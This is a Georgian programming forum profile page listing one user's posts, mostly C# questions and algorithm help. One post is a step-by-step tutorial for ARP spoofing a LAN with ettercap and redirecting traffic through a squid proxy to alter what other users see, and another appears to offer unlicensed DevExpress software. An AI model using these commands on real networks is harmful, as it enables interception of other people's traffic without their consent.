Jump to content

Jubsika

წევრი
  • Content count

    180
  • Joined

  • Last visited

  • Days Won

    23

Jubsika last won the day on March 24 2016

Jubsika had the most liked content!

Community Reputation

65 ნორმალური

3 Followers

About Jubsika

  • Rank
    წევრი

Profile Information

  • ლოკაცია
    Tbilisi
  • ინტერესები
    Programming

Recent Profile Visitors

2.287 profile views
  1. სხვა გზა არ მექნება სავარაუდოდ მაშინ System.Net.NetworkInformation ამას გამოვიყენებ ისევ
  2. კაი გამარჯობათ სასტავ, ერთი ასეთი შემთხვევა მაქვს იქნებ გქონიათ ვინმეს პრაქტიკაში. აპლიკაცია ბაზაზეა დაქონექთებული და უპრობლემოდ მომაქვს საჭირო ინფორმაცია, მაგრამ ამავე პროგრამაში მჭირდება სერვერების პინგი, სერვერების პინგისთვის ვიყენებ NetUtils და პრობლემა იმაშია რომ როგორც კი References ში დავამატებ ამ NetUtils.dll ამის შემდეგ ბაზასთან ვეღარ გადის კავშირზე აპლიკაცია. ცალკე აპლიკაციაში ვცადე აწყობა მხოლოდ პინგის და უპრობლემოდ მუშაობს. ხო არ იცით მსგავსი რამის შესახებ ან უკეთესი მეთოდი ხომ არ გაქვთ დაწერილი, ანუ უნდა დავპინგო აიპების რეინჯი (5აიპი) და ქსელის ხარისხი გავიგო რამდენი პროცენტი დაკარგა და ასე შემდეგ
  3. არა სასურველი უნდა მონიშნო რომელიც გინდა სხვადასხვებია. პირველი მონიშნე და ეგ გადმოწერე და მაგის გაშვების დროს თან გადმოიწერება და თან დაინსტალირდება
  4. როგორ თუ სხვა საიტიდან გაწერინებს? https://www.microsoft.com/en-us/download/details.aspx?id=30678 სცადე აქ
  5. ამ სტატიაში გაეცნობით ერთ საინტერესო გაკვეთილს თუ როგორ შეცვალოთ ლანში მყოფ კომპიუტერებზე საიტზე შეისვლისას ყველა ფოტო ამ დღეებში დამჭირდა ასეთი რამ, ლანში ყველა კომპისათვის ისეთი რამ უნდა გამეკეთებინა, რომ ნებისმიერ საიტზე შესვლისას ყველა ფოტო ჩანაცვლებულიყო ჩემ მიერ მითითებული ფოტოთი. გუგლაობის შემდეგ ვნახე ამაზე საინტერესო მასალები და ახლა ჩემ ენაზე გადმოგითარგმნით ამ ტუტორიალში მე ვიყენებ შემდეგ ხელსაწყოებს:ფლეშკაზე ჩაწერილი backtrack 4r2squid3ettercapდა some custom scripts.სკრიპტებს რაც შეეხება ისენი მიმაგრებული არიან პოსტს. ამ how-to-ში მე ვიყენებ replaceImages.pl სკრიპტს რომელიც ამისამართებს ყველა სურათს ჩემს მიერ მითითებულ სურათზე. #ვაინსტალირებთ squid3-ს apt-get install squid3 #ვაკონფიგებთ ფაილს /etc/squid3/squid.conf vim /etc/squid3/squid.conf #თუ ჩვენ ლანში კომპებს ip მისამართები აქვთ დიაპაზონიდან 192.168.1.* მაშინ ვამატებთ ლაინს: acl lani src 192.168.1.0/24 http_access allow lani #მოვძებნოთ ფაილში შემდეგი სტრინგი: http_port 3128 და მივუწეროთ მას: transparent http_port 3128 transparent #ვუთითებთ ჩვენი სკრიპტის მდებარეობას url_rewrite_program /root/replaceImages.pl #ვინახავთ ფაილს :wq #ვჩმოდავთ ჩვენ სკრიპტს chmod 777 /root/replaceImages.pl #ვრთავთ squid-ის სერვისს: service squid3 start #firewall-იდან ვარედაქტირებთ მეოთხმოცე პორტს squid-ის პორტზე: iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 3128 #ვაკონფიგებთ ettercap-ს vim /etc/etter.conf # [privs] სექციაში არსებულ მონაცემებს ვცვლით შემდეგზე ec_uid = 0 ec_gid = 0 # ანკომენტს ვუკეთებთ შემდეგ მონაცემებს (# ნიშანს ვუშლით წინ) # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #ვიწყებთ arp spoofing-ს. ამ ბრძანებით ქსელში ყველა კომპისთვის თქვენი კომპი იქნება გეიტვეი: ettercap -T -i eth0 -M arp // // ამის შემდეგ ქსელის ნებისმიერი კომპი როდესაც შევა რომელიმე საიტზე, ყველა სურათი ჩაუნაცვლდება იმ სურათით რომელიც მითითებულია ჩვენ სკრიპტში. ყველას შეგიძლიათ ჩაანაცვლოთ ეს სურათი თქვენით. replaceImages.pl სკრიპტში შეცვალეთ ცვლადი$imageURL = ნათარგმნი ვერსია http://pingvinuka.blogspot.com/ Zviad Kikvidze ორიგინალი ვერსია http://www.backtrack-linux.org/forums/showthread.php?t=39227
  6. ნაკლებად სავარაუდოა მაგ შემთხვევაში ბარათის გატეხვაზე და მსგავსი სახით ფულის შოვნაზე საუბარი მაგრამ ზოგადად თუ გაინტერესებთ გაეცანით შესავალი თბილისში საზოგადოებივი ტრანსპორტის გადახდის სისტემის რეფორმამ ძალიან გაუმარტივა ცხოვრება ბევრ მოქალაქეს, მათ შორის მეც. აღარ არის ავტობუსიდან ჩასვლისას რიგში დგომა, მერე მძღოლთან ფულის გადახურდავებ-გადმოხურდავება, მეტროში ყოველი ჩასვლისას ჟეტონის ყიდვა და ა.შ. ყველას აქვს შესაძლებლობა იყიდოს მეტრომანის თხელი და ლამაზი ბარათი, რომლითაც შეძლებს გადაიხადოს როგორც მეტროში, ასევე ავტობუსში და ე.წ. მარშუტკაშიც. მე პირადად ძალიან დიდი მადლობელი ვარ ამ სისტემის და მათი დამნერგავების მიმართ. მაგრამ ახალ ტექნოლოგიებს ხშირად უსაფრთხოების პრობლემებიც ახლავს, მითუმეტეს მაშინ, როცა თავიდანვე არ ხდება გათვლა უსაფრთხოებაზე, ან ხდება, მაგრამ ზოგჯერ აღმოჩნდება, რომ უსაფრთხოება უფრო ძვირი ჯდება, ვიდრე მისი არქონისგან გამოწვეული ზარალის ოდენობაა.არ ვიცი ნახსენები ვარიანტებიდან რომელი იყო სინამდვილეში, მაგრამ ფაქტია, რომ უსაფრთხოების პრობლემა არსებობს. პრობლემა დღეს თბილისის საზოგადოებრივი ტრანსპორტის გადახდის სისტემაში გამოიყენება ერთი ტიპის ბარათი, რომლის სახელია Mifare CLASSIC. ბარათის ტექნოლოგია და მისი დაცვის საშუალებები დიდი ხნის წინ შეიმუშავა და დააპატენტა კომპანია NXP-მ. ის საკმაოდ მარტივი მოსახმარია და გამოიყენება მსოფლიოს ქალაქების უმრავლესობის საზოგადოებრივ ტრასპორტებში. სურ.: Mifare CLASSIC ბარათის შიგთავსი თუმცა 2007 წლიდან, რამდენიმე მკვლევარის წყალობით მოხდა NXP-ს მიერ შემუშავებული დაცვის მექანიზმების გადალახვა, რაც საშუალებას იძლეოდა, რომ მომხდარიყო ბარათის შიგთავსის გაშიფვრა, მოდიფიცირება, დაკლონვა და ა.შ.რა თქმა უნდა აქ არ დავწერ რაიმენაირ ტექნიკურ დეტალებს შეტევის შესახებ თუ როგორ და რა ხელსაწყოებით შეიძლება მსგავსი შეტევის გაკეთება, მაგრამ დავწერ, რომ ეს შესაძლებელია, და ისიც ვიცი (მართალია ჭორის დონეზე), რომ რამდენიმე ადამიანი ამას აკეთებს, ანუ ასე რომ ვთქვათ აყალბებენ მეტრომანის ბარათებს.თუ ეს მართალია, ნამდვილად ცუდი ფაქტია, მაგრამ ეს დიდად არ დააზარალებს არც ტრანსპორტის კომპანიებს და არც პატიოსან გადამხდელებს. მაგრამ რა მოხდება როცა ეს შეტევის მეთოდი ფართო მასებში გავრცელდება? რა მოხდება თუ ვაგზალზე მიხვალ და 1 ლარად 5 ლარს ჩაგიწერენ ბარათზე? ასეთი მასობრივი ზომების მიღების შემთხვევაში (და ასე ადრე თუ გვიან იქნება imho), ეს უკვე მართლა პრობლემა იქნება და აქედან გამომდინარე გადაჭრის გზებზეც აქედანვე ვინმემ უნდა იფიქროს. პრობლემის გადაჭრის გზები ამ პრობლემის მოსაგვარებლად მე პირადად ორ გზას ვხედავ (რა თქმა უნდა სხვა გზებიც შეიძლება არსებობდეს). თუმცა ორივე ფინანსებთანაა დაკავშირებული.გზა 1: მოხდეს სისტემის გადაკეთება ისე, რომ ყველა წამკითხველი, ეს იქნება ავტობუსში, „მარშუტკაში" თუ მეტროში, იყოს online, ანუ ჰქონდეს მუდმივი ან დროგამოშვებითი კავშირი ცენტრალიზებულ სისტემასთან. ეს საშუალებას მისცემს კომპანიას, რომ დააფიქსიროს გაყალბებული ბარათები. ეს მარტივი ლოგიკით შეიძლება მოხდეს. მაგალითად ცენტრალურმა სისტემამ იცის, რომ ბარათზე, რომელზეც იყო 0 თეთრი, ერთ დღეს ჩაირიცხა 2 ლარი, მეორე დღეს კი დაიხარჯა 3 ლარი, ეს ავტომატურად ნიშნავს რომ ბარათი გაყალბებულია.გზა 2: მოხდეს ახალი ტიპის ბარათებზე გადასვლა, რომელიც უზრუნველყოფს იმას, რომ ბარათის კლონირება ან მისი შიგთავსის არაავტორიზებული შეცვლა შეუძლებელი გახდება. მაგალითად MIFARE Plus სტანდარტის ბარათებს გააჩნიათ AES-128 გასაღებების მხარდაჭერა, რისი საშუალებითაც შეუძლებელს ხდის ნახსენებ შეტევებს. ასეთი გასაღებების წაკითხვის საშუალება წამკითხავსაც უნდა გააჩნდეს, თუმცა თუ ეს ასე არ არის, ბარათი მაინც იმუშავებს, მაგრამ შიფრაციის გასაღებების გარეშე. ეს შესაძლებელს ხდის, რომ ეტაპობრივად მოხდეს ახალ წამკითხველებზე და ბარათებზე გადასვლა.p.s. იბეის მიხედვით, Mifare Plus ბარათები დაახლოებით 2-ჯერ ძვირი ღირს ვიდრე Mifare Classic.აღსანიშნავია, რომ მსოფლიოს რამდენიმე ქალაქში უკვე წააწყდნენ მსგავს პრობლემას და მოუწიათ ახალი ტიპის ბარათებზე გადასვლა, მაგალითად დუბლინში გადავიდნენ Mifare DESFire ბარათებზე, თუმცა მასზეც არსებობს შეტევის მეთოდები, მართალია ნაკლებად ცნობილი და ძნელად გასაკეთებელი, მაგრამ მაინც. ასევე Desfire ბარათები უფრო ძვირი ღირს. ბოლოსიტყვაობა როგორც ავღნიშნე დღეს-დღეობით ეს არ არის რეალური პრობლემა, თუმცა დიდი ალბათობით მომავალში იქნება. ეს პოსტი დავწერე ე.წ. Awareness მიზნით, რომ ამის შესახებ იქნებ ვინმე შესაბამისი პასუხისმგებლობის მქონემ აქედანვე დაიწყოს ამაზე ფიქრი. ან ბოლოს და ბოლოს სხვა ქალაქებში მსგავსი სისტემის დანერგვის შემთხვევაში მაინც მოხდეს უსაფრთხოების გათვალისწინება. © http://pingvinuka.blogspot.com/ Zviad Kikvidze
  7. მოგესალმებით, ვისაც გსმენით DevExpress ის შესახებ ძალიან კარგი მაგრამ ვისაც არა მოკლედ აგიხსნით https://www.devexpress.com/ მოკლედ ბევრი რომ არ ვილაპარაკო ძალიან კარგი თულბოქსები აქვს მრავალი შესაძლებლობით უკვე 2 წელია ამას ვხმარობ დამატებითი ინფორმაციას ადვილად მოიძიებთ. არსებობს მრავალი ინფორმაცია თუ სადმე გაიჭედებით უბრალოდ დაგუგლეთ, თუ არადა ოფიციალური საპორტიც ყავს დაუპოსტავ და მაშინვე გეხმარებიან. 14-ე ვერსიის სრული ლიცენზირებული ვერსია გადმოწერა
  8. @m3sk4lit0 ეგ ყველაფერი კარგი მაგრამ თაიმი თაიმსტემპიდან უნდა ამოვიღო @GHOST_FATHER გეუბნები თქვი ერთი დღე და წავიდეთ დავლიოთ თქო მაგრამ გპის ვერ მოგაშორე ძმაო
  9. მუშაობს საღოლ თან ძალიან სწრაფია... ჩემი კვდებოდა :/ და მაინც ურევდა რაღაცას ერთი მცირედი დეტალიც და მოვჩები ამ საკითხს :)))) სანამ ამ ყველაფერს შეამოწმებს ან ამავე პირობაში ჩაიდოს, ლისტიდან ამოშალოს ან არ შეამოწმოს ყველა ისეთი 3 და 4 რომელიც არ მდებარეობს შუალედში 09:00 - 18:00 მაგრამ "მაგრამ" არის აქ და თუ ერორი იყო ამ შუალედში და მოგვარება ვერ ნახა 18:00 წუთამდე მოგვარებათ აიღოს 18:00 ესეც გამაკეთებინეთ და წავედით ლუდზე :)) თან გავიცნობთ ერთმანეთს. #Ghost ბებერო არ მოვიწყოთ ერთი საღამო?
  10. კი, ანუ უფრო მარტივად რომ გაიგო რა ხდება სამიანია შეცდომა და ოთხიანი მოგვარება და წარმოიდგინე Downtime ითვლი. და შესაბამისად როცა სამიანი იქნება ანუ შეცდომა მოხდება ეძებს მოგვარებას ანუ 4 იანს და რომ იპოვის 4 იანს გამოაკლებს 3 იანს. და ლოგი რომ იყოს 3 3 3 4 შუა ორ სამიანს ყურადღება არ უნდა მიაქციოს და წაშალოს ანუ პირველი ერორი დაიმახსოვროს და მოგვარებას გამოაკლეს ეგ ერორი. კომპთან რომ მოხვდები შენივე ალგორითმში ჩაწერე თუ არ შეწუხდები
  11. კი, ანუ უფრო მარტივად რომ გაიგო რა ხდება სამიანია შეცდომა და ოთხიანი მოგვარება და წარმოიდგინე Downtime ითვლი. და შესაბამისად როცა სამიანი იქნება ანუ შეცდომა მოხდება ეძებს მოგვარებას ანუ 4 იანს და რომ იპოვის 4 იანს გამოაკლებს 3 იანს. და ლოგი რომ იყოს 3 3 3 4 შუა ორ სამიანს ყურადღება არ უნდა მიაქციოს და წაშალოს ანუ პირველი ერორი დაიმახსოვროს და მოგვარებას გამოაკლეს ეგ ერორი. კომპთან რომ მოხვდები შენივე ალგორითმში ჩაწერე თუ არ შეწუხდები
  12. ლოგიკა არასწორია მაინც, შეიძლება ვერ აგიხსენი კარგად ანუ შენს შემთხვევაში პირველად სწორად ამოიღო ანუ იპოვა 3 და მის შემდეგ მყოფი ოთხიანი და 78-632 datalist.Add(new datastruct(){ msg = 4, timestamp = 78 }); datalist.Add(new datastruct(){ msg = 3, timestamp = 632 }); და პირველი შედეგიც სწორად გამოიტანა, მაგრამ აი ამის მერე უნდა იპოვოს 3 იანი და მაგ სამიანის შემდეგ მყოფი 4 ი ანუ შენს შემთხვევაში ანუ 444-98 datalist.Add(new datastruct(){ msg = 3, timestamp = 12 }); datalist.Add(new datastruct(){ msg = 4, timestamp = 55 }); და ეს datalist.Add(new datastruct(){ msg = 4, timestamp = 444 }); datalist.Add(new datastruct(){ msg = 3, timestamp = 152 }); ეს datalist.Add(new datastruct(){ msg = 3, timestamp = 98 }); datalist.Add(new datastruct(){ msg = 4, timestamp = 353 }); იმედია მიხვდი
  13. ვერ მივხვდი ლოგიკას :/ ზემოთ რა ცხრილის დავწერე წარმოიდგინე ის არის AllLog ლისტში დაწერე აბა მერე რომ მოიცლი მთლიანად რა გამოვა... while ით დავწერე მე და ლოგიკაში ჩავწერე რომ სამმიანს რომ იპოვის ოთხიანი იპოვოს ამ სამიანზე მეტი ტამისპემპით და სორტირებული მაქვს მანამდე და შესაბამისად სწორ ოთხიანს პოულობს ანუ მომდევნოს. მაგრამ ორი სამიანი თუ დახვდა მერე ერხევვა
×